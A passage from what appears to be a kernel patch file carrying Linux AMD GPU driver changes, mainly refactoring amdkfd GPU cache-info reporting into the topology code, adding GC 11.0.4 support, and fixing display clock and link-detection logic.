+-	int i, j, k;
+-	int ct = 0;
+-	int mem_available = available_size;
+-	unsigned int cu_processor_id;
+-	int ret;
+-	unsigned int num_cu_shared;
+ 
+ 	switch (kdev->adev->asic_type) {
+ 	case CHIP_KAVERI:
+-		pcache_info = kaveri_cache_info;
++		*pcache_info = kaveri_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(kaveri_cache_info);
+ 		break;
+ 	case CHIP_HAWAII:
+-		pcache_info = hawaii_cache_info;
++		*pcache_info = hawaii_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(hawaii_cache_info);
+ 		break;
+ 	case CHIP_CARRIZO:
+-		pcache_info = carrizo_cache_info;
++		*pcache_info = carrizo_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(carrizo_cache_info);
+ 		break;
+ 	case CHIP_TONGA:
+-		pcache_info = tonga_cache_info;
++		*pcache_info = tonga_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(tonga_cache_info);
+ 		break;
+ 	case CHIP_FIJI:
+-		pcache_info = fiji_cache_info;
++		*pcache_info = fiji_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(fiji_cache_info);
+ 		break;
+ 	case CHIP_POLARIS10:
+-		pcache_info = polaris10_cache_info;
++		*pcache_info = polaris10_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(polaris10_cache_info);
+ 		break;
+ 	case CHIP_POLARIS11:
+-		pcache_info = polaris11_cache_info;
++		*pcache_info = polaris11_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(polaris11_cache_info);
+ 		break;
+ 	case CHIP_POLARIS12:
+-		pcache_info = polaris12_cache_info;
++		*pcache_info = polaris12_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(polaris12_cache_info);
+ 		break;
+ 	case CHIP_VEGAM:
+-		pcache_info = vegam_cache_info;
++		*pcache_info = vegam_cache_info;
+ 		num_of_cache_types = ARRAY_SIZE(vegam_cache_info);
+ 		break;
+ 	default:
+ 		switch (KFD_GC_VERSION(kdev)) {
+ 		case IP_VERSION(9, 0, 1):
+-			pcache_info = vega10_cache_info;
++			*pcache_info = vega10_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vega10_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 2, 1):
+-			pcache_info = vega12_cache_info;
++			*pcache_info = vega12_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vega12_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 4, 0):
+ 		case IP_VERSION(9, 4, 1):
+-			pcache_info = vega20_cache_info;
++			*pcache_info = vega20_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vega20_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 4, 2):
+-			pcache_info = aldebaran_cache_info;
++			*pcache_info = aldebaran_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(aldebaran_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 1, 0):
+ 		case IP_VERSION(9, 2, 2):
+-			pcache_info = raven_cache_info;
++			*pcache_info = raven_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(raven_cache_info);
+ 			break;
+ 		case IP_VERSION(9, 3, 0):
+-			pcache_info = renoir_cache_info;
++			*pcache_info = renoir_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(renoir_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 1, 10):
+ 		case IP_VERSION(10, 1, 2):
+ 		case IP_VERSION(10, 1, 3):
+ 		case IP_VERSION(10, 1, 4):
+-			pcache_info = navi10_cache_info;
++			*pcache_info = navi10_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(navi10_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 1, 1):
+-			pcache_info = navi14_cache_info;
++			*pcache_info = navi14_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(navi14_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 0):
+-			pcache_info = sienna_cichlid_cache_info;
++			*pcache_info = sienna_cichlid_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(sienna_cichlid_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 2):
+-			pcache_info = navy_flounder_cache_info;
++			*pcache_info = navy_flounder_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(navy_flounder_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 4):
+-			pcache_info = dimgrey_cavefish_cache_info;
++			*pcache_info = dimgrey_cavefish_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(dimgrey_cavefish_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 1):
+-			pcache_info = vangogh_cache_info;
++			*pcache_info = vangogh_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(vangogh_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 5):
+-			pcache_info = beige_goby_cache_info;
++			*pcache_info = beige_goby_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(beige_goby_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 3):
+-			pcache_info = yellow_carp_cache_info;
++			*pcache_info = yellow_carp_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(yellow_carp_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 6):
+-			pcache_info = gc_10_3_6_cache_info;
++			*pcache_info = gc_10_3_6_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(gc_10_3_6_cache_info);
+ 			break;
+ 		case IP_VERSION(10, 3, 7):
+-			pcache_info = gfx1037_cache_info;
++			*pcache_info = gfx1037_cache_info;
+ 			num_of_cache_types = ARRAY_SIZE(gfx1037_cache_info);
+ 			break;
+ 		case IP_VERSION(11, 0, 0):
+ 		case IP_VERSION(11, 0, 1):
+ 		case IP_VERSION(11, 0, 2):
+ 		case IP_VERSION(11, 0, 3):
+-			pcache_info = cache_info;
++		case IP_VERSION(11, 0, 4):
+ 			num_of_cache_types =
+-				kfd_fill_gpu_cache_info_from_gfx_config(kdev, pcache_info);
++				kfd_fill_gpu_cache_info_from_gfx_config(kdev, *pcache_info);
+ 			break;
+ 		default:
+-			return -EINVAL;
+-		}
+-	}
+-
+-	*size_filled = 0;
+-	*num_of_entries = 0;
+-
+-	/* For each type of cache listed in the kfd_gpu_cache_info table,
+-	 * go through all available Compute Units.
+-	 * The [i,j,k] loop will
+-	 *		if kfd_gpu_cache_info.num_cu_shared = 1
+-	 *			will parse through all available CU
+-	 *		If (kfd_gpu_cache_info.num_cu_shared != 1)
+-	 *			then it will consider only one CU from
+-	 *			the shared unit
+-	 */
+-
+-	for (ct = 0; ct < num_of_cache_types; ct++) {
+-	  cu_processor_id = gpu_processor_id;
+-	  if (pcache_info[ct].cache_level == 1) {
+-	    for (i = 0; i < cu_info->num_shader_engines; i++) {
+-	      for (j = 0; j < cu_info->num_shader_arrays_per_engine; j++) {
+-	        for (k = 0; k < cu_info->num_cu_per_sh;
+-		  k += pcache_info[ct].num_cu_shared) {
+-		  ret = fill_in_l1_pcache(pcache,
+-					pcache_info,
+-					cu_info,
+-					mem_available,
+-					cu_info->cu_bitmap[i % 4][j + i / 4],
+-					ct,
+-					cu_processor_id,
+-					k);
+-
+-		  if (ret < 0)
++			*pcache_info = dummy_cache_info;
++			num_of_cache_types = ARRAY_SIZE(dummy_cache_info);
++			pr_warn("dummy cache info is used temporarily and real cache info need update later.\n");
+ 			break;
+-
+-		  if (!ret) {
+-				pcache++;
+-				(*num_of_entries)++;
+-				mem_available -= sizeof(*pcache);
+-				(*size_filled) += sizeof(*pcache);
+-		  }
+-
+-		  /* Move to next CU block */
+-		  num_cu_shared = ((k + pcache_info[ct].num_cu_shared) <=
+-					cu_info->num_cu_per_sh) ?
+-					pcache_info[ct].num_cu_shared :
+-					(cu_info->num_cu_per_sh - k);
+-		  cu_processor_id += num_cu_shared;
+ 		}
+-	      }
+-	    }
+-	  } else {
+-			ret = fill_in_l2_l3_pcache(pcache,
+-				pcache_info,
+-				cu_info,
+-				mem_available,
+-				ct,
+-				cu_processor_id);
+-
+-			if (ret < 0)
+-				break;
+-
+-			if (!ret) {
+-				pcache++;
+-				(*num_of_entries)++;
+-				mem_available -= sizeof(*pcache);
+-				(*size_filled) += sizeof(*pcache);
+-			}
+-	  }
+ 	}
+-
+-	pr_debug("Added [%d] GPU cache entries\n", *num_of_entries);
+-
+-	return 0;
++	return num_of_cache_types;
+ }
+ 
+ static bool kfd_ignore_crat(void)
+@@ -2263,8 +2092,6 @@ static int kfd_create_vcrat_image_gpu(void *pcrat_image,
+ 	struct kfd_cu_info cu_info;
+ 	int avail_size = *size;
+ 	uint32_t total_num_of_cu;
+-	int num_of_cache_entries = 0;
+-	int cache_mem_filled = 0;
+ 	uint32_t nid = 0;
+ 	int ret = 0;
+ 
+@@ -2365,31 +2192,12 @@ static int kfd_create_vcrat_image_gpu(void *pcrat_image,
+ 	crat_table->length += sizeof(struct crat_subtype_memory);
+ 	crat_table->total_entries++;
+ 
+-	/* TODO: Fill in cache information. This information is NOT readily
+-	 * available in KGD
+-	 */
+-	sub_type_hdr = (typeof(sub_type_hdr))((char *)sub_type_hdr +
+-		sub_type_hdr->length);
+-	ret = kfd_fill_gpu_cache_info(kdev, cu->processor_id_low,
+-				avail_size,
+-				&cu_info,
+-				(struct crat_subtype_cache *)sub_type_hdr,
+-				&cache_mem_filled,
+-				&num_of_cache_entries);
+-
+-	if (ret < 0)
+-		return ret;
+-
+-	crat_table->length += cache_mem_filled;
+-	crat_table->total_entries += num_of_cache_entries;
+-	avail_size -= cache_mem_filled;
+-
+ 	/* Fill in Subtype: IO_LINKS
+ 	 *  Only direct links are added here which is Link from GPU to
+ 	 *  its NUMA node. Indirect links are added by userspace.
+ 	 */
+ 	sub_type_hdr = (typeof(sub_type_hdr))((char *)sub_type_hdr +
+-		cache_mem_filled);
++		sub_type_hdr->length);
+ 	ret = kfd_fill_gpu_direct_io_link_to_cpu(&avail_size, kdev,
+ 		(struct crat_subtype_iolink *)sub_type_hdr, proximity_domain);
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+index 482ba84a728d1..a8671061a175a 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_crat.h
+@@ -317,6 +317,18 @@ struct cdit_header {
+ 
+ struct kfd_dev;
+ 
++/* Static table to describe GPU Cache information */
++struct kfd_gpu_cache_info {
++	uint32_t	cache_size;
++	uint32_t	cache_level;
++	uint32_t	flags;
++	/* Indicates how many Compute Units share this cache
++	 * within a SA. Value = 1 indicates the cache is not shared
++	 */
++	uint32_t	num_cu_shared;
++};
++int kfd_get_gpu_cache_info(struct kfd_dev *kdev, struct kfd_gpu_cache_info **pcache_info);
++
+ int kfd_create_crat_image_acpi(void **crat_image, size_t *size);
+ void kfd_destroy_crat_image(void *crat_image);
+ int kfd_parse_crat_table(void *crat_image, struct list_head *device_list,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device.c b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+index a75e1af77365d..27820f0a282d1 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+@@ -154,6 +154,7 @@ static void kfd_device_info_set_event_interrupt_class(struct kfd_dev *kfd)
+ 	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
++	case IP_VERSION(11, 0, 4):
+ 		kfd->device_info.event_interrupt_class = &event_interrupt_class_v11;
+ 		break;
+ 	default:
+@@ -396,6 +397,7 @@ struct kfd_dev *kgd2kfd_probe(struct amdgpu_device *adev, bool vf)
+ 			f2g = &gfx_v11_kfd2kgd;
+ 			break;
+ 		case IP_VERSION(11, 0, 1):
++		case IP_VERSION(11, 0, 4):
+ 			gfx_target_version = 110003;
+ 			f2g = &gfx_v11_kfd2kgd;
+ 			break;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 35a9b702508af..713f893d25302 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -364,7 +364,6 @@ static ssize_t kfd_cache_show(struct kobject *kobj, struct attribute *attr,
+ 
+ 	/* Making sure that the buffer is an empty string */
+ 	buffer[0] = 0;
+-
+ 	cache = container_of(attr, struct kfd_cache_properties, attr);
+ 	if (cache->gpu && kfd_devcgroup_check_permission(cache->gpu))
+ 		return -EPERM;
+@@ -379,12 +378,13 @@ static ssize_t kfd_cache_show(struct kobject *kobj, struct attribute *attr,
+ 	sysfs_show_32bit_prop(buffer, offs, "association", cache->cache_assoc);
+ 	sysfs_show_32bit_prop(buffer, offs, "latency", cache->cache_latency);
+ 	sysfs_show_32bit_prop(buffer, offs, "type", cache->cache_type);
++
+ 	offs += snprintf(buffer+offs, PAGE_SIZE-offs, "sibling_map ");
+-	for (i = 0; i < CRAT_SIBLINGMAP_SIZE; i++)
++	for (i = 0; i < cache->sibling_map_size; i++)
+ 		for (j = 0; j < sizeof(cache->sibling_map[0])*8; j++)
+ 			/* Check each bit */
+ 			offs += snprintf(buffer+offs, PAGE_SIZE-offs, "%d,",
+-					 (cache->sibling_map[i] >> j) & 1);
++						(cache->sibling_map[i] >> j) & 1);
+ 
+ 	/* Replace the last "," with end of line */
+ 	buffer[offs-1] = '\n';
+@@ -1198,7 +1198,6 @@ static struct kfd_topology_device *kfd_assign_gpu(struct kfd_dev *gpu)
+ 	struct kfd_iolink_properties *iolink;
+ 	struct kfd_iolink_properties *p2plink;
+ 
+-	down_write(&topology_lock);
+ 	list_for_each_entry(dev, &topology_device_list, list) {
+ 		/* Discrete GPUs need their own topology device list
+ 		 * entries. Don't assign them to CPU/APU nodes.
+@@ -1222,7 +1221,6 @@ static struct kfd_topology_device *kfd_assign_gpu(struct kfd_dev *gpu)
+ 			break;
+ 		}
+ 	}
+-	up_write(&topology_lock);
+ 	return out_dev;
+ }
+ 
+@@ -1593,6 +1591,221 @@ out:
+ 	return ret;
+ }
+ 
++
++/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
++static int fill_in_l1_pcache(struct kfd_cache_properties **props_ext,
++				struct kfd_gpu_cache_info *pcache_info,
++				struct kfd_cu_info *cu_info,
++				int cu_bitmask,
++				int cache_type, unsigned int cu_processor_id,
++				int cu_block)
++{
++	unsigned int cu_sibling_map_mask;
++	int first_active_cu;
++	struct kfd_cache_properties *pcache = NULL;
++
++	cu_sibling_map_mask = cu_bitmask;
++	cu_sibling_map_mask >>= cu_block;
++	cu_sibling_map_mask &= ((1 << pcache_info[cache_type].num_cu_shared) - 1);
++	first_active_cu = ffs(cu_sibling_map_mask);
++
++	/* CU could be inactive. In case of shared cache find the first active
++	 * CU. and incase of non-shared cache check if the CU is inactive. If
++	 * inactive active skip it
++	 */
++	if (first_active_cu) {
++		pcache = kfd_alloc_struct(pcache);
++		if (!pcache)
++			return -ENOMEM;
++
++		memset(pcache, 0, sizeof(struct kfd_cache_properties));
++		pcache->processor_id_low = cu_processor_id + (first_active_cu - 1);
++		pcache->cache_level = pcache_info[cache_type].cache_level;
++		pcache->cache_size = pcache_info[cache_type].cache_size;
++
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_DATA_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_DATA;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_INST_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_INSTRUCTION;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_CPU_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_CPU;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_SIMD_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_HSACU;
++
++		/* Sibling map is w.r.t processor_id_low, so shift out
++		 * inactive CU
++		 */
++		cu_sibling_map_mask =
++			cu_sibling_map_mask >> (first_active_cu - 1);
++
++		pcache->sibling_map[0] = (uint8_t)(cu_sibling_map_mask & 0xFF);
++		pcache->sibling_map[1] =
++				(uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
++		pcache->sibling_map[2] =
++				(uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
++		pcache->sibling_map[3] =
++				(uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
++
++		pcache->sibling_map_size = 4;
++		*props_ext = pcache;
++
++		return 0;
++	}
++	return 1;
++}
++
++/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
++static int fill_in_l2_l3_pcache(struct kfd_cache_properties **props_ext,
++				struct kfd_gpu_cache_info *pcache_info,
++				struct kfd_cu_info *cu_info,
++				int cache_type, unsigned int cu_processor_id)
++{
++	unsigned int cu_sibling_map_mask;
++	int first_active_cu;
++	int i, j, k;
++	struct kfd_cache_properties *pcache = NULL;
++
++	cu_sibling_map_mask = cu_info->cu_bitmap[0][0];
++	cu_sibling_map_mask &=
++		((1 << pcache_info[cache_type].num_cu_shared) - 1);
++	first_active_cu = ffs(cu_sibling_map_mask);
++
++	/* CU could be inactive. In case of shared cache find the first active
++	 * CU. and incase of non-shared cache check if the CU is inactive. If
++	 * inactive active skip it
++	 */
++	if (first_active_cu) {
++		pcache = kfd_alloc_struct(pcache);
++		if (!pcache)
++			return -ENOMEM;
++
++		memset(pcache, 0, sizeof(struct kfd_cache_properties));
++		pcache->processor_id_low = cu_processor_id
++					+ (first_active_cu - 1);
++		pcache->cache_level = pcache_info[cache_type].cache_level;
++		pcache->cache_size = pcache_info[cache_type].cache_size;
++
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_DATA_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_DATA;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_INST_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_INSTRUCTION;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_CPU_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_CPU;
++		if (pcache_info[cache_type].flags & CRAT_CACHE_FLAGS_SIMD_CACHE)
++			pcache->cache_type |= HSA_CACHE_TYPE_HSACU;
++
++		/* Sibling map is w.r.t processor_id_low, so shift out
++		 * inactive CU
++		 */
++		cu_sibling_map_mask = cu_sibling_map_mask >> (first_active_cu - 1);
++		k = 0;
++
++		for (i = 0; i < cu_info->num_shader_engines; i++) {
++			for (j = 0; j < cu_info->num_shader_arrays_per_engine; j++) {
++				pcache->sibling_map[k] = (uint8_t)(cu_sibling_map_mask & 0xFF);
++				pcache->sibling_map[k+1] = (uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
++				pcache->sibling_map[k+2] = (uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
++				pcache->sibling_map[k+3] = (uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
++				k += 4;
++
++				cu_sibling_map_mask = cu_info->cu_bitmap[i % 4][j + i / 4];
++				cu_sibling_map_mask &= ((1 << pcache_info[cache_type].num_cu_shared) - 1);
++			}
++		}
++		pcache->sibling_map_size = k;
++		*props_ext = pcache;
++		return 0;
++	}
++	return 1;
++}
++
++#define KFD_MAX_CACHE_TYPES 6
++
++/* kfd_fill_cache_non_crat_info - Fill GPU cache info using kfd_gpu_cache_info
++ * tables
++ */
++void kfd_fill_cache_non_crat_info(struct kfd_topology_device *dev, struct kfd_dev *kdev)
++{
++	struct kfd_gpu_cache_info *pcache_info = NULL;
++	int i, j, k;
++	int ct = 0;
++	unsigned int cu_processor_id;
++	int ret;
++	unsigned int num_cu_shared;
++	struct kfd_cu_info cu_info;
++	struct kfd_cu_info *pcu_info;
++	int gpu_processor_id;
++	struct kfd_cache_properties *props_ext;
++	int num_of_entries = 0;
++	int num_of_cache_types = 0;
++	struct kfd_gpu_cache_info cache_info[KFD_MAX_CACHE_TYPES];
++
++	amdgpu_amdkfd_get_cu_info(kdev->adev, &cu_info);
++	pcu_info = &cu_info;
++
++	gpu_processor_id = dev->node_props.simd_id_base;
++
++	pcache_info = cache_info;
++	num_of_cache_types = kfd_get_gpu_cache_info(kdev, &pcache_info);
++	if (!num_of_cache_types) {
++		pr_warn("no cache info found\n");
++		return;
++	}
++
++	/* For each type of cache listed in the kfd_gpu_cache_info table,
++	 * go through all available Compute Units.
++	 * The [i,j,k] loop will
++	 *		if kfd_gpu_cache_info.num_cu_shared = 1
++	 *			will parse through all available CU
++	 *		If (kfd_gpu_cache_info.num_cu_shared != 1)
++	 *			then it will consider only one CU from
++	 *			the shared unit
++	 */
++	for (ct = 0; ct < num_of_cache_types; ct++) {
++		cu_processor_id = gpu_processor_id;
++		if (pcache_info[ct].cache_level == 1) {
++			for (i = 0; i < pcu_info->num_shader_engines; i++) {
++				for (j = 0; j < pcu_info->num_shader_arrays_per_engine; j++) {
++					for (k = 0; k < pcu_info->num_cu_per_sh; k += pcache_info[ct].num_cu_shared) {
++
++						ret = fill_in_l1_pcache(&props_ext, pcache_info, pcu_info,
++										pcu_info->cu_bitmap[i % 4][j + i / 4], ct,
++										cu_processor_id, k);
++
++						if (ret < 0)
++							break;
++
++						if (!ret) {
++							num_of_entries++;
++							list_add_tail(&props_ext->list, &dev->cache_props);
++						}
++
++						/* Move to next CU block */
++						num_cu_shared = ((k + pcache_info[ct].num_cu_shared) <=
++							pcu_info->num_cu_per_sh) ?
++							pcache_info[ct].num_cu_shared :
++							(pcu_info->num_cu_per_sh - k);
++						cu_processor_id += num_cu_shared;
++					}
++				}
++			}
++		} else {
++			ret = fill_in_l2_l3_pcache(&props_ext, pcache_info,
++								pcu_info, ct, cu_processor_id);
++
++			if (ret < 0)
++				break;
++
++			if (!ret) {
++				num_of_entries++;
++				list_add_tail(&props_ext->list, &dev->cache_props);
++			}
++		}
++	}
++	dev->node_props.caches_count += num_of_entries;
++	pr_debug("Added [%d] GPU cache entries\n", num_of_entries);
++}
++
+ int kfd_topology_add_device(struct kfd_dev *gpu)
+ {
+ 	uint32_t gpu_id;
+@@ -1617,9 +1830,9 @@ int kfd_topology_add_device(struct kfd_dev *gpu)
+ 	 * CRAT to create a new topology device. Once created assign the gpu to
+ 	 * that topology device
+ 	 */
++	down_write(&topology_lock);
+ 	dev = kfd_assign_gpu(gpu);
+ 	if (!dev) {
+-		down_write(&topology_lock);
+ 		proximity_domain = ++topology_crat_proximity_domain;
+ 
+ 		res = kfd_create_crat_image_virtual(&crat_image, &image_size,
+@@ -1631,6 +1844,7 @@ int kfd_topology_add_device(struct kfd_dev *gpu)
+ 			topology_crat_proximity_domain--;
+ 			return res;
+ 		}
++
+ 		res = kfd_parse_crat_table(crat_image,
+ 					   &temp_topology_device_list,
+ 					   proximity_domain);
+@@ -1644,23 +1858,28 @@ int kfd_topology_add_device(struct kfd_dev *gpu)
+ 		kfd_topology_update_device_list(&temp_topology_device_list,
+ 			&topology_device_list);
+ 
++		dev = kfd_assign_gpu(gpu);
++		if (WARN_ON(!dev)) {
++			res = -ENODEV;
++			goto err;
++		}
++
++		/* Fill the cache affinity information here for the GPUs
++		 * using VCRAT
++		 */
++		kfd_fill_cache_non_crat_info(dev, gpu);
++
+ 		/* Update the SYSFS tree, since we added another topology
+ 		 * device
+ 		 */
+ 		res = kfd_topology_update_sysfs();
+-		up_write(&topology_lock);
+-
+ 		if (!res)
+ 			sys_props.generation_count++;
+ 		else
+ 			pr_err("Failed to update GPU (ID: 0x%x) to sysfs topology. res=%d\n",
+ 						gpu_id, res);
+-		dev = kfd_assign_gpu(gpu);
+-		if (WARN_ON(!dev)) {
+-			res = -ENODEV;
+-			goto err;
+-		}
+ 	}
++	up_write(&topology_lock);
+ 
+ 	dev->gpu_id = gpu_id;
+ 	gpu->id = gpu_id;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+index 9f6c949186c19..19283b8b16884 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.h
+@@ -80,6 +80,8 @@ struct kfd_mem_properties {
+ 	struct attribute	attr;
+ };
+ 
++#define CACHE_SIBLINGMAP_SIZE 64
++
+ struct kfd_cache_properties {
+ 	struct list_head	list;
+ 	uint32_t		processor_id_low;
+@@ -90,10 +92,11 @@ struct kfd_cache_properties {
+ 	uint32_t		cache_assoc;
+ 	uint32_t		cache_latency;
+ 	uint32_t		cache_type;
+-	uint8_t			sibling_map[CRAT_SIBLINGMAP_SIZE];
++	uint8_t			sibling_map[CACHE_SIBLINGMAP_SIZE];
+ 	struct kfd_dev		*gpu;
+ 	struct kobject		*kobj;
+ 	struct attribute	attr;
++	uint32_t		sibling_map_size;
+ };
+ 
+ struct kfd_iolink_properties {
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+index 24715ca2fa944..01383aac6b419 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn301/vg_clk_mgr.c
+@@ -529,6 +529,19 @@ static struct clk_bw_params vg_bw_params = {
+ 
+ };
+ 
++static uint32_t find_max_clk_value(const uint32_t clocks[], uint32_t num_clocks)
++{
++	uint32_t max = 0;
++	int i;
++
++	for (i = 0; i < num_clocks; ++i) {
++		if (clocks[i] > max)
++			max = clocks[i];
++	}
++
++	return max;
++}
++
+ static unsigned int find_dcfclk_for_voltage(const struct vg_dpm_clocks *clock_table,
+ 		unsigned int voltage)
+ {
+@@ -572,12 +585,16 @@ static void vg_clk_mgr_helper_populate_bw_params(
+ 
+ 	bw_params->clk_table.num_entries = j + 1;
+ 
+-	for (i = 0; i < bw_params->clk_table.num_entries; i++, j--) {
++	for (i = 0; i < bw_params->clk_table.num_entries - 1; i++, j--) {
+ 		bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
+ 		bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
+ 		bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
+ 		bw_params->clk_table.entries[i].dcfclk_mhz = find_dcfclk_for_voltage(clock_table, clock_table->DfPstateTable[j].voltage);
+ 	}
++	bw_params->clk_table.entries[i].fclk_mhz = clock_table->DfPstateTable[j].fclk;
++	bw_params->clk_table.entries[i].memclk_mhz = clock_table->DfPstateTable[j].memclk;
++	bw_params->clk_table.entries[i].voltage = clock_table->DfPstateTable[j].voltage;
++	bw_params->clk_table.entries[i].dcfclk_mhz = find_max_clk_value(clock_table->DcfClocks, VG_NUM_DCFCLK_DPM_LEVELS);
+ 
+ 	bw_params->vram_type = bios_info->memory_type;
+ 	bw_params->num_channels = bios_info->ma_channel_number;
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index 328c5e33cc66b..bf7fcd268cb47 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1016,6 +1016,7 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 	struct dc_sink *prev_sink = NULL;
+ 	struct dpcd_caps prev_dpcd_caps;
+ 	enum dc_connection_type new_connection_type = dc_connection_none;
++	enum dc_connection_type pre_connection_type = link->type;
+ 	const uint32_t post_oui_delay = 30; // 30ms
+ 
+ 	DC_LOGGER_INIT(link->ctx->logger);
+@@ -1118,6 +1119,8 @@ static bool detect_link_and_local_sink(struct dc_link *link,
+ 			}
+ 
+ 			if (!detect_dp(link, &sink_caps, reason)) {
++				link->type = pre_connection_type;
++
+ 				if (prev_sink)
+ 					dc_sink_release(prev_sink);
+ 				return false;
+@@ -1349,6 +1352,8 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 	bool is_delegated_to_mst_top_mgr = false;
+ 	enum dc_connection_type pre_link_type = link->type;
+ 
++	DC_LOGGER_INIT(link->ctx->logger);
++
+ 	is_local_sink_detect_success = detect_link_and_local_sink(link, reason);
+ 
+ 	if (is_local_sink_detect_success && link->local_sink)
+@@ -1359,6 +1364,10 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 			link->dpcd_caps.is_mst_capable)
+ 		is_delegated_to_mst_top_mgr = discover_dp_mst_topology(link, reason);
+ 
++	DC_LOG_DC("%s: link_index=%d is_local_sink_detect_success=%d pre_link_type=%d link_type=%d\n", __func__,
++		 link->link_index, is_local_sink_detect_success, pre_link_type, link->type);
++
++
+ 	if (is_local_sink_detect_success &&
+ 			pre_link_type == dc_connection_mst_branch &&
+ 			link->type != dc_connection_mst_branch)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index e4472c6be6c32..3fb4bcc343531 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -271,8 +271,7 @@ static void dccg32_set_dpstreamclk(
+ 	dccg32_set_dtbclk_p_src(dccg, src, otg_inst);
+ 
+ 	/* enabled to select one of the DTBCLKs for pipe */
+-	switch (otg_inst)
+-	{
++	switch (dp_hpo_inst) {
+ 	case 0:
+ 		REG_UPDATE_2(DPSTREAMCLK_CNTL,
